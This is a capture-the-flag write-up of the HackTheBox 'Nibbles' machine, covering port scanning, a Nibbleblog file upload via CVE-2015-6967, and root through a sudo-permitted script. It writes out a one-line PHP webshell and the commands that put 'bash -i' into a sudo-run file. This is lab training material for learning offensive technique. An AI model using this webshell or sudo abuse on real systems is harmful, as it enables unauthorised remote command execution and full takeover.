This is the writeup for Nibbles machine from HTB.
Scanning and enumeration
Now it’s time to start the active scanning.
As always, we define our TARGET and hosts file of our machine to facilitate the process.
1
2
TARGET=10.10.10.75
echo "10.10.10.75 nibbles.htb" | sudo tee -a /etc/hosts
We launch a single TCMP
probe to check ping.
1
ping -c 1 $TARGET # => Ping is working
NMAP
To scan the target
to find open ports and possible vulnerabilities we use nmap
.
First, simple TCP
scan without DNS
resolution and ping discovery, to all the ports and with the version detection.
1
nmap -n -Pn -sV -p- $TARGET -vvv -oG allPorts
Nibbleblog
First we visit the site http://nibbles.htb, from the source code we can see that there is an indication to nibbleblog
. This is an important clue because we can already check on the internet.
It looks like to exploit the RCE
we might need to be logged in. This is something somehow difficult, because it requires guessing and the machine has a protection in place to avoid people from using tools like hydra
.
The user can be obtained from the </nibbleblog/content/private/users.xml> and the password must be guessed. (In real life probably we should have exploit the CSRF or XSS and wait for the user to login, with this blacklist protection is hard…)
Once we are inside we are going to use CVE-2015-6967 to upload a ‘php webshell
.
1
echo "<?php system($_REQUEST['cmd']); ?>" > cmd.php
Ignore the warnings after uploading the image and go to _</nibbleblog/content/private/plugins/my_image/image.php?cmd=whoami>. It will display the username.
_
Gaining access
Just launch a reverse shell (I like the shortest python3…)
Privilege escalation / lateral movements
We execute sudo -l
to understand if it is possible to execute commands as sudo
. We see that it is possible to execute sudo /home/nibbler/personal/stuff/monitor.sh
The file doesn’t exist so we just need to create it and grant permissions
1
2
3
4
5
mkdir /home/nibbler/personal
mkdir /home/nibbler/personal/stuff
echo "bash -i" > /home/nibbler/personal/stuff/monitor.sh
chmod +x /home/nibbler/personal/stuff/monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
And we are root!